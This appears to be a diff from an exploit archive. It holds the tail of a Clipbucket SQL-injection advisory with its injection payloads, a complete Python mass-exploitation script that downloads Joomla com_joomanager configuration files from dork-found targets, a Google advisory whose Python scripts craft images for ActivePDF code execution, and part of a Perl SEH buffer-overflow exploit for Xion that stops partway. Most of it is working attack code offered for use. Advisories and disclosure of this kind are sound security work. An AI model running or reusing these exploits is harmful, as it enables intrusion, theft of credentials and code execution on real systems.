PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())
|
||||
|
||||
The source code excerpt below shows the vulnerable code
|
||||
VULN. FILE : /actions/vote_channel.php
|
||||
VULN. CODE :
|
||||
[...]
|
||||
$vote = $_POST["vote"];
|
||||
$userid = $_POST["channelId"];
|
||||
//if($userquery->login_check('',true)){
|
||||
if($vote == "yes"){
|
||||
$query = "UPDATE " . tbl("users") . " SET voted = voted + 1, likes = likes + 1
|
||||
WHERE userid = {$userid}";
|
||||
}else{
|
||||
//$query = "UPDATE " . tbl("users") . " SET likes = likes (- 1) WHERE userid =
|
||||
{$userid}";
|
||||
$sel = "Select userid,username,likes From ".tbl("users")." WHERE userid =
|
||||
{$userid}";
|
||||
$result = $db->Execute($sel);
|
||||
foreach ($result as $row )
|
||||
$current_likes = $row['likes'];
|
||||
$decremented_like = $current_likes-1;
|
||||
$query = "Update ".tbl("users")." Set likes = $decremented_like Where userid
|
||||
= $userid";
|
||||
}
|
||||
[...]
|
||||
|
||||
URL : http://$HOST/ajax/commonAjax.php
|
||||
METHOD : POST
|
||||
PAYLOAD : mode=emailExists&email=1' or '1'='1
|
||||
|
||||
The source code excerpt below shows the vulnerable code
|
||||
VULN. FILE : /ajax/commonAjax.php
|
||||
VULN. CODE :
|
||||
[...]
|
||||
$email = $_POST['email'];
|
||||
$check = $db->select(tbl('users'),"email"," email='$email'");
|
||||
if (!$check) {
|
||||
echo "NO";
|
||||
}
|
||||
[...]
|
||||
|
||||
URL : http://$HOST/ajax/commonAjax.php
|
||||
METHOD : POST
|
||||
PAYLOAD : mode=userExists&username=1' or '1'='1
|
||||
|
||||
The source code excerpt below shows the vulnerable code
|
||||
VULN. FILE : /ajax/commonAjax.php
|
||||
VULN. CODE :
|
||||
[...]
|
||||
$username = $_POST['username'];
|
||||
$check = $db->select(tbl('users'),"username"," username='$username'");
|
||||
if (!$check) {
|
||||
echo "NO";
|
||||
}
|
||||
[...]
|
||||
|
||||
|
||||
Vulnerable / tested versions:
|
||||
-----------------------------
|
||||
Clipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were
|
||||
the latest at the time the security vulnerabilities were discovered.
|
||||
|
||||
|
||||
Vendor contact timeline:
|
||||
------------------------
|
||||
2017-10-17: Contacting vendor through email.
|
||||
2017-10-18: Vendor asking for additional details.
|
||||
2017-10-19: Replied to vendor.
|
||||
2017-10-26: Request update from vendor, no response.
|
||||
2017-11-09: Request update from vendor.
|
||||
2017-11-09: Vendor response with security patches.
|
||||
2017-11-10: Notified vendor the security patches don't fix the reported issues
|
||||
2017-11-30: Request update from vendor.
|
||||
2017-11-30: Vendor requesting for support via Skype
|
||||
2017-12-07: Response to vendor.
|
||||
2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again
|
||||
2018-01-22: Vendor provides latest patches, scheduled for future release
|
||||
2018-01-26: Verified that the patches don't fully mitigate all issues.
|
||||
2018-01-29: Request update from vendor, no response.
|
||||
2018-02-06: Request update from vendor, no response.
|
||||
2018-02-08: Informing vendor of public release date
|
||||
2018-02-08: Vendor: Stable v4.0 including security fixes will be released in
|
||||
two weeks; postponing once again for two weeks
|
||||
2018-02-23: Request update from vendor.
|
||||
2018-02-26: Vendor publishes v4.0
|
||||
2018-02-27: Public release of security advisory
|
||||
|
||||
|
||||
|
||||
Solution:
|
||||
---------
|
||||
The vendor provided the following patched version:
|
||||
https://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip
|
||||
|
||||
|
||||
Workaround:
|
||||
-----------
|
||||
None
|
||||
|
||||
|
||||
Advisory URL:
|
||||
-------------
|
||||
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
|
||||
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
SEC Consult
|
||||
Bangkok - Berlin - Linz - Luxembourg - Montreal
|
||||
Moscow - Munich - Kuala Lumpur - Singapore
|
||||
Vienna (HQ) - Vilnius - Zurich
|
||||
|
||||
About SEC Consult Vulnerability Lab
|
||||
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
|
||||
ensures the continued knowledge gain of SEC Consult in the field of network
|
||||
and application security to stay ahead of the attacker. The SEC Consult
|
||||
Vulnerability Lab supports high-quality penetration testing and the evaluation
|
||||
of new offensive and defensive technologies for our customers. Hence our
|
||||
customers obtain the most current information about vulnerabilities and valid
|
||||
recommendation about the risk profile of new technologies.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Interested to work with the experts of SEC Consult?
|
||||
Send us your application https://www.sec-consult.com/en/career/index.html
|
||||
|
||||
Interested in improving your cyber security with the experts of SEC Consult?
|
||||
Contact our local offices https://www.sec-consult.com/en/contact/index.html
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Mail: research at sec-consult dot com
|
||||
Web: https://www.sec-consult.com
|
||||
Blog: http://blog.sec-consult.com
|
||||
Twitter: https://twitter.com/sec_consult
|
265
exploits/php/webapps/44252.py
Executable file
265
exploits/php/webapps/44252.py
Executable file
|
@ -0,0 +1,265 @@
|
|||
#!/usr/bin/python2
|
||||
# -*- coding:utf-8 -*-
|
||||
'''
|
||||
|
||||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 3, 29 June 2007
|
||||
|
||||
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
|
||||
Everyone is permitted to copy and distribute verbatim copies
|
||||
of this license document, but changing it is not allowed.
|
||||
|
||||
Preamble
|
||||
|
||||
The GNU General Public License is a free, copyleft license for
|
||||
software and other kinds of works.
|
||||
|
||||
The licenses for most software and other practical works are designed
|
||||
to take away your freedom to share and change the works. By contrast,
|
||||
the GNU General Public License is intended to guarantee your freedom to
|
||||
share and change all versions of a program--to make sure it remains free
|
||||
software for all its users. We, the Free Software Foundation, use the
|
||||
GNU General Public License for most of our software; it applies also to
|
||||
any other work released this way by its authors. You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not
|
||||
price. Our General Public Licenses are designed to make sure that you
|
||||
have the freedom to distribute copies of free software (and charge for
|
||||
them if you wish), that you receive source code or can get it if you
|
||||
want it, that you can change the software or use pieces of it in new
|
||||
free programs, and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to prevent others from denying you
|
||||
these rights or asking you to surrender the rights. Therefore, you have
|
||||
certain responsibilities if you distribute copies of the software, or if
|
||||
you modify it: responsibilities to respect the freedom of others.
|
||||
|
||||
For example, if you distribute copies of such a program, whether
|
||||
gratis or for a fee, you must pass on to the recipients the same
|
||||
freedoms that you received. You must make sure that they, too, receive
|
||||
or can get the source code. And you must show them these terms so they
|
||||
know their rights.
|
||||
|
||||
Developers that use the GNU GPL protect your rights with two steps:
|
||||
(1) assert copyright on the software, and (2) offer you this License
|
||||
giving you legal permission to copy, distribute and/or modify it.
|
||||
|
||||
For the developers' and authors' protection, the GPL clearly explains
|
||||
that there is no warranty for this free software. For both users' and
|
||||
authors' sake, the GPL requires that modified versions be marked as
|
||||
changed, so that their problems will not be attributed erroneously to
|
||||
authors of previous versions.
|
||||
|
||||
Some devices are designed to deny users access to install or run
|
||||
modified versions of the software inside them, although the manufacturer
|
||||
can do so. This is fundamentally incompatible with the aim of
|
||||
protecting users' freedom to change the software. The systematic
|
||||
pattern of such abuse occurs in the area of products for individuals to
|
||||
use, which is precisely where it is most unacceptable. Therefore, we
|
||||
have designed this version of the GPL to prohibit the practice for those
|
||||
products. If such problems arise substantially in other domains, we
|
||||
stand ready to extend this provision to those domains in future versions
|
||||
of the GPL, as needed to protect the freedom of users.
|
||||
|
||||
Finally, every program is threatened constantly by software patents.
|
||||
States should not allow patents to restrict development and use of
|
||||
software on general-purpose computers, but in those that do, we wish to
|
||||
avoid the special danger that patents applied to a free program could
|
||||
make it effectively proprietary. To prevent this, the GPL assures that
|
||||
patents cannot be used to render the program non-free.
|
||||
|
||||
The precise terms and conditions for copying, distribution and
|
||||
modification follow.
|
||||
'''
|
||||
try:
|
||||
import urllib2
|
||||
except:
|
||||
print "$ pip2 install urllib2"
|
||||
try:
|
||||
import argparse
|
||||
except:
|
||||
print "$ pip2 install argparse"
|
||||
try:
|
||||
import BeautifulSoup
|
||||
except:
|
||||
print "$ pip2 install BeautifulSoup"
|
||||
try:
|
||||
import urlparse
|
||||
except:
|
||||
print "$ pip2 install urlparse"
|
||||
try:
|
||||
import requests
|
||||
except:
|
||||
print "$ pip2 install requests"
|
||||
try:
|
||||
import threading
|
||||
except:
|
||||
print "$ pip2 install threading"
|
||||
import time, sys , os
|
||||
global Animation, slowprint, fastprint
|
||||
os.system('clear')
|
||||
|
||||
class Lab_Collors():
|
||||
vermelho = '\033[31m'
|
||||
verde = '\033[32m'
|
||||
azul = '\033[34m'
|
||||
ciano = '\033[36m'
|
||||
purple = '\033[35m'
|
||||
amarelo = '\033[33m'
|
||||
preto = '\033[30m'
|
||||
branco = '\033[37m'
|
||||
original = '\033[0;0m'
|
||||
reverso = '\033[2m'
|
||||
default = '\033[0m'
|
||||
|
||||
def slowprint(s):
|
||||
for c in s + '\n':
|
||||
sys.stdout.write(c)
|
||||
sys.stdout.flush() # defeat buffering
|
||||
time.sleep(8./90)
|
||||
#time.sleep(10./90)
|
||||
|
||||
def fastprint(s):
|
||||
for c in s + '\n':
|
||||
sys.stdout.write(c)
|
||||
sys.stdout.flush() # defeat buffering
|
||||
time.sleep(1./50)
|
||||
|
||||
def Animation(String, color):
|
||||
animation = "|/-\\"
|
||||
for i in range(15):
|
||||
time.sleep(0.1)
|
||||
sys.stdout.write("\r" + "[" + animation[i % len(animation)] + "]" + color + String)
|
||||
sys.stdout.flush()
|
||||
print('')
|
||||
|
||||
print ''
|
||||
parser = argparse.ArgumentParser(description='JOOMANAGER_Arbitrary_File_Download')
|
||||
parser.add_argument('-t','--targets', action='store',help='--targets Targets.txt')
|
||||
args = parser.parse_args()
|
||||
|
||||
|
||||
|
||||
class Lab_Banners():
|
||||
Bulls = '''
|
||||
╭━━━┳╮╱╱╱╱╱╱╱╭╮
|
||||
┃╭━╮┃┃╱╱╱╱╱╱╭╯╰╮
|
||||
┃╰━╯┃╰━┳━━┳━╋╮╭╋━━┳━━┳╮╭╮
|
||||
┃╭━━┫╭╮┃╭╮┃╭╮┫┃┃╭╮┃━━┫╰╯┃
|
||||
┃┃╱╱┃┃┃┃╭╮┃┃┃┃╰┫╭╮┣━━┃┃┃┃
|
||||
╰╯╱╱╰╯╰┻╯╰┻╯╰┻━┻╯╰┻━━┻┻┻╯
|
||||
, . ╭╮╱╱╱╱╱╭╮
|
||||
/| |\ ┃┃╱╱╱╱╱┃┃
|
||||
|-| łαbørαŧøriø Ŧαηŧαsмα |-| ┃┃╱╱╭━━┫╰━╮
|
||||
[ "-.____ ____.-" ] ┃┃╱╭┫╭╮┃╭╮┃
|
||||
\_ / \ ___.___ / \ _/ ┃╰━╯┃╭╮┃╰╯┃
|
||||
"-__[ ===!=== ]__-" ╰━━━┻╯╰┻━━╯
|
||||
| | +==========================================================+
|
||||
.-"" _|=__ | __=|_ ""-, | COM_JOOMANAGER ARBITRARY FILE DOWNLOAD |
|
||||
`""" \ "`==´ `==´" / """´ +==========================================================+
|
||||
\ \\ // / | [*] GoogleDork: allinurl:index.php?option=com_joomanager |
|
||||
\ |\___/| / | [*] GoogleDork: allinurl:/component/joomanager/ |
|
||||
\,;-----;./ | [*] Coded: Luth1er [*] Date: 30 - 06 - 2017 |
|
||||
| @@ @@ | | [*] GitHub: https://github.com/Luth1er |
|
||||
\ -"""- / | - I take no responsibilities for the |
|
||||
`-----´ | - use of this program ! |
|
||||
+==========================================================+'''
|
||||
if not args.targets:
|
||||
os.system('clear')
|
||||
print Lab_Collors.azul+Lab_Banners.Bulls
|
||||
print ''
|
||||
print Lab_Collors.ciano+"[*] Usage: "
|
||||
print Lab_Collors.branco+"Joomanager_Afd.py --target Targets.txt"
|
||||
print Lab_Collors.branco+"Joomanager_Afd.py -t Targets.txt"
|
||||
print ''
|
||||
exit()
|
||||
|
||||
print Lab_Collors.azul+Lab_Banners.Bulls
|
||||
slowprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.purple+"@DreadPirateRobertt")
|
||||
fastprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.azul+"t.me/Phantasm_Lab")
|
||||
|
||||
|
||||
class COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(threading.Thread):
|
||||
global Animation, fastprint
|
||||
def __init__(self, targets):
|
||||
threading.Thread.__init__(self)
|
||||
targets = open(targets, 'r').readlines()
|
||||
self.targets = targets
|
||||
self.process = None
|
||||
def run(self):
|
||||
try:
|
||||
count = 0
|
||||
print ''
|
||||
Animation("COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD", Lab_Collors.verde)
|
||||
print ''
|
||||
for target in self.targets:
|
||||
try:
|
||||
target = target.strip()
|
||||
exploit3r = "index.php?option=com_joomanager&controller=details&task=download&path=configuration.php"
|
||||
exploit_dir = str(target+exploit3r)
|
||||
try:
|
||||
path = urlparse.urlparse(target).path
|
||||
url_title = target.replace(path, "")
|
||||
title = requests.get(url_title)
|
||||
except:
|
||||
title = requests.get(target)
|
||||
exploit = urllib2.urlopen(exploit_dir)
|
||||
|
||||
soup = BeautifulSoup.BeautifulSoup(title.content.decode('utf-8','ignore'))
|
||||
Scraping_title = str(soup.title.text)
|
||||
with open(soup.title.text+".php","wb") as Attatchment:
|
||||
Attatchment.write(exploit.read())
|
||||
print ''
|
||||
print Lab_Collors.verde+"+==========================+"
|
||||
print Lab_Collors.verde+"| Exploit Information: |"
|
||||
print Lab_Collors.verde+"+================================================================================"
|
||||
print Lab_Collors.purple+"[+] Target: {}".format(Lab_Collors.amarelo+url_title)
|
||||
print Lab_Collors.purple+"[+] Title: {}".format(Lab_Collors.azul+Scraping_title)
|
||||
fastprint(Lab_Collors.purple+"[+] Exploited: ========================================================> 100%")
|
||||
print Lab_Collors.purple+"[+] Server: {}".format(str(Lab_Collors.amarelo+title.headers['server']))
|
||||
try:
|
||||
print Lab_Collors.purple+"[+] Connection: {}".format(Lab_Collors.branco+str(title.headers['Connection']))
|
||||
except:
|
||||
pass
|
||||
print Lab_Collors.purple+"[+] Exploit: {}".format(Lab_Collors.vermelho+exploit3r)
|
||||
print Lab_Collors.purple+"[+] Path: "+Lab_Collors.ciano+"/COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD/Title.php"
|
||||
print Lab_Collors.verde+"+================================================================================"
|
||||
print ''
|
||||
count = count + 1
|
||||
except KeyboardInterrupt:
|
||||
print("Exiting")
|
||||
sys.exit(1)
|
||||
except Exception as Error:
|
||||
print "Error as {}".format(Error)
|
||||
pass
|
||||
Animation("Logout....", Lab_Collors.vermelho)
|
||||
print Lab_Collors.branco+"[!] Total Exploited: %s" % str(count)
|
||||
print ''
|
||||
sys.exit(1)
|
||||
except KeyboardInterrupt:
|
||||
print "Exiting...."
|
||||
sys.exit(1)
|
||||
|
||||
def main():
|
||||
try:
|
||||
threads = 1
|
||||
for host in range(int(threads)):
|
||||
Init_Atck = COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(args.targets)
|
||||
Init_Atck.daemon=True
|
||||
Init_Atck.start()
|
||||
while True: time.sleep(100)
|
||||
except (KeyboardInterrupt, SystemExit):
|
||||
print''
|
||||
Animation(" Exit Threading....", Lab_Collors.vermelho)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
main()
|
||||
except Exception as e:
|
||||
print "[!] Error as %s" % e
|
||||
exit()
|
||||
except KeyboardInterrupt:
|
||||
fastprint(Lab_Collors.vermelho+"[!] Keyboard as Interrupt....")
|
||||
exit()
|
201
exploits/windows/dos/44251.txt
Normal file
201
exploits/windows/dos/44251.txt
Normal file
|
@ -0,0 +1,201 @@
|
|||
ActivePDF Toolkit < 8.1.0 multiple RCE
|
||||
|
||||
Introduction
|
||||
============
|
||||
The ActivePDF Toolkit is a Windows library which enhances business
|
||||
processes to stamp, stitch, merge, form-fill, add digital signatures,
|
||||
barcodes to PDF. Both .NET and native APIs are provided. Amongst many
|
||||
other operations, this library can be used by applications to transform
|
||||
images to PDF files.
|
||||
|
||||
Multiple vulnerabilities were identified in the Pictview image processing
|
||||
library embedded by the Toolkit and signed by ActivePDF. They could allow
|
||||
remote attackers to compromise applications relying on the Toolkit to
|
||||
process untrusted images. Note that, while the example instances hereafter
|
||||
use “exotic” file types, the parser determines the image type from magic
|
||||
bytes, ignoring file extensions in most cases.
|
||||
|
||||
CVE
|
||||
===
|
||||
CVE-2018-7264
|
||||
|
||||
Affected versions
|
||||
=================
|
||||
ActivePDF Toolkit before 8.1.0 (build 8.1.0.19023)
|
||||
|
||||
Author
|
||||
======
|
||||
François Goichon - Google Security Team
|
||||
|
||||
CVE-2018-7264
|
||||
=============
|
||||
ActivePDF Toolkit < 8.1.0.19023 multiple RCE
|
||||
|
||||
Summary
|
||||
-------
|
||||
An image processing library embedded in the ActivePDF Toolkit product is
|
||||
prone to multiple BSS out-of-bound and signedess errors which can yield
|
||||
direct EIP control by overwriting function pointers, error handling
|
||||
structures or IAT entries. Note that the affected library does not enable
|
||||
ASLR.
|
||||
|
||||
Reproduction
|
||||
------------
|
||||
The following scripts can be used to generate crafted image files which
|
||||
achieve EIP control when parsed or converted by the ActivePDF Toolkit (e.g.
|
||||
via the ImageToPDF method), through different root causes. These examples
|
||||
can be reproduced through both the .NET and native APIs and independently
|
||||
from file extensions, however the .NET layer will hide the native crashes
|
||||
and return -1. This may crash the library with a lock on, so only use in
|
||||
test environments.
|
||||
|
||||
* Interchange File Format (.iff) and derivates
|
||||
---
|
||||
#!/usr/bin/env python2
|
||||
#
|
||||
# eax=28147510 ebx=00009c1c ecx=28147510 edx=00009c1c esi=28140e90
|
||||
edi=02930a6c
|
||||
# eip=41414141 esp=0061f264 ebp=0061f26c iopl=0 nv up ei pl nz na
|
||||
po nc
|
||||
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
|
||||
efl=00010202
|
||||
# 41414141 ?? ???
|
||||
|
||||
from struct import pack
|
||||
|
||||
header = "FORMXOXOILBM"
|
||||
|
||||
bodycontents = "AAA"
|
||||
body = "BODY" + pack(">I", len(bodycontents)) + bodycontents
|
||||
while (len(body) % 2) == 1:
|
||||
body += "\x00"
|
||||
|
||||
base = 0x28147510
|
||||
payload = pack("<I", base).ljust(0x28151114 - base, "A") + pack("<I", base)
|
||||
cmap = "CMAP" + pack(">I", len(payload)) + payload
|
||||
while (len(cmap) % 2) == 1:
|
||||
cmap += "\x00"
|
||||
|
||||
outp = header + cmap + body
|
||||
assert len(outp) >= 0x28
|
||||
|
||||
with open("test.iff", "wb") as f:
|
||||
f.write(outp)
|
||||
---
|
||||
|
||||
* Zoner Draw images (.zmf, .zbr)
|
||||
---
|
||||
#!/usr/bin/env python2
|
||||
#
|
||||
# eax=28151110 ebx=0000002e ecx=0000bc28 edx=2813eb10 esi=00000008
|
||||
edi=028e0a6c
|
||||
# eip=41414141 esp=2814550c ebp=41414141 iopl=0 nv up ei ng nz ac
|
||||
pe cy
|
||||
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
|
||||
efl=00010297
|
||||
# 41414141 ?? ???
|
||||
|
||||
from struct import pack
|
||||
|
||||
header = pack("<III", 0x5c, 0xD4015ADD, 0x12345678)
|
||||
header = header.ljust(9*4) + pack("<I", 0x3c)
|
||||
header = header.ljust(0x3c)
|
||||
|
||||
base = 0x2814550C
|
||||
payload = '\x00' * (0x28151124 - base) + pack("<I", base) + "A"*8
|
||||
|
||||
# can be triggered by multiple formats
|
||||
header2 = pack("<H", 0x4d42)
|
||||
header2 = header2.ljust(14) + pack("<I", 50-14)
|
||||
header2 = header2.ljust(28) + pack("<HI", 0, 0)
|
||||
header2 = header2.ljust(46) + pack("<I", len(payload)/4 + 1)
|
||||
|
||||
outp = header + header2 + payload
|
||||
|
||||
with open("test.zmf", "w") as f:
|
||||
f.write(outp)
|
||||
---
|
||||
|
||||
* Sun Raster images (.ras)
|
||||
---
|
||||
#!/usr/bin/python2
|
||||
#
|
||||
#WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding
|
||||
can be inaccurate.
|
||||
#eax=28151110 ebx=0000000c ecx=0000fc2d edx=2813eb10 esi=00000008
|
||||
edi=02880a6c
|
||||
#eip=41414141 esp=28141504 ebp=41414141 iopl=0 nv up ei ng nz ac pe
|
||||
cy
|
||||
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
|
||||
efl=00010297
|
||||
#41414141 ?? ???
|
||||
|
||||
from struct import pack
|
||||
|
||||
header = pack(">IIIIIII", 0x59A66A95, 0x100, 1, 8, 0, 2, 1)
|
||||
|
||||
base = 0x28141504
|
||||
payload = "".ljust(0x28151124 - base, "\x00") + pack("<I", base) + "A"*8
|
||||
outp = header + pack(">I", len(payload)+1) + payload
|
||||
|
||||
with open("test.ras", "wb") as f:
|
||||
f.write(outp)
|
||||
---
|
||||
|
||||
* Truevision Targa images (.bpx)
|
||||
---
|
||||
#!/usr/bin/env python2
|
||||
#
|
||||
#eax=28151110 ebx=00000004 ecx=00000008 edx=2813eb10 esi=00000008
|
||||
edi=028f0a6c
|
||||
#eip=41414141 esp=0061f2a0 ebp=0061f2e8 iopl=0 nv up ei ng nz ac pe
|
||||
cy
|
||||
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
|
||||
efl=00010297
|
||||
#41414141 ?? ???
|
||||
|
||||
from struct import pack
|
||||
|
||||
target = 0x2815112C
|
||||
payload = "AAAA"
|
||||
|
||||
# TGA / PIC / BPX
|
||||
base = { 3: 0x28147510, 4: 0x2814550c }
|
||||
align = None
|
||||
for al in [3, 4]:
|
||||
if ((target - base[al]) % al) == 0:
|
||||
align = al
|
||||
break
|
||||
assert align
|
||||
|
||||
header = "\x00\x01\x00"
|
||||
header += pack("<H", (target - base[align])/align)
|
||||
header += pack("<H", (len(payload)/align)+1)
|
||||
header += chr(32 if align == 4 else 24)
|
||||
header = header.ljust(16)
|
||||
header += chr(1)
|
||||
header = header.ljust(18)
|
||||
|
||||
with open("test.bpx", "wb") as f:
|
||||
f.write(header + payload)
|
||||
---
|
||||
|
||||
Remediation
|
||||
-----------
|
||||
Upgrade to ActivePDF Toolkit >= 8.1.0 (build 8.1.0.19023), which fixes the
|
||||
problem by removing the affected image processing library. Note that this
|
||||
also fixes the similar ZDI-16-354 vulnerability.
|
||||
|
||||
For more information and guidance, please contact the ActivePDF support
|
||||
through their portal (https://support.activepdf.com).
|
||||
|
||||
|
||||
Disclosure timeline
|
||||
===================
|
||||
2017/11/28 - Report sent to ActivePDF support
|
||||
2017/11/28 - Support acknowledges the issue and confirms that the library
|
||||
is scheduled to be removed from the product
|
||||
2018/01/29 - Received notification from the ActivePDF support that the
|
||||
Pictview image processing library had been removed from ActivePDF in build
|
||||
8.1.0.19023
|
||||
2017/02/26 - Public disclosure
|
177
exploits/windows/local/44243.pl
Executable file
177
exploits/windows/local/44243.pl
Executable file
|
@ -0,0 +1,177 @@
|
|||
#!/usr/bin/perl
|
||||
# ########################################################################
|
||||
# Title: Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit
|
||||
# Vulnerability Type: Execute Code, Overflow UTF-16LE buffer, Memory corruption
|
||||
# Date: Feb 18, 2018
|
||||
# Author: James Anderson (synthetic)
|
||||
# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31
|
||||
# Exploit mitigation: There is no /SAFESEH, SEHOP, /GS, DEP, ASLR
|
||||
# About: The technique is taken from that paper: Creating Arbitrary Shellcode In Unicode Expanded Strings Chris Anley
|
||||
# Tested on: Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32
|
||||
# ########################################################################
|
||||
# _ _ _ _
|
||||
# ___ _ _ _ __ | |_| |__ ___| |_(_) ___
|
||||
# / __| | | | '_ \| __| '_ \ / _ \ __| |/ __|
|
||||
# \__ \ |_| | | | | |_| | | | __/ |_| | (__
|
||||
# |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___|
|
||||
# |___/
|
||||
#
|
||||
# ########################################################################
|
||||
|
||||
my $path = "/media/s4/DragonR.m3u";
|
||||
|
||||
my $buffer_length = 5000;
|
||||
my $suboffset = 0x104;
|
||||
my $NOP1 = "\x6F"; # add [edi], ch
|
||||
my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx
|
||||
|
||||
# [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame
|
||||
my $crash = "A" x 260;
|
||||
# [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame
|
||||
$crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX
|
||||
$crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR
|
||||
|
||||
my $offset_to_payload = length($crash);
|
||||
|
||||
# [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode.
|
||||
# [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode]
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\x6a\x59"; # push 0 # pop ecx
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\x41"; # inc ecx
|
||||
$crash .= "\xCC"; # add ah, cl # eax = eax + 0x100
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\x41"; # inc ecx
|
||||
$crash .= "\xC8"; # add al, cl
|
||||
$crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC;
|
||||
|
||||
# [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x3b\x41"; # mov edx, 41003b00
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
|
||||
# [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00
|
||||
$crash .= "\x40"; # inc eax
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\xec\x41"; # mov edx, 4100ec00
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x45\x41"; # mov edx, 41004500
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x46\x41"; # mov edx, 41004600
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x68\x41"; # mov edx, 41006800
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x78\x41"; # mov edx, 41007800
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x2F\x41"; # mov edx, 41002F00
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x63\x41"; # mov edx, 41006300
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x64\x41"; # mov edx, 41006400
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x8d\x41"; # mov edx, 41008d00
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
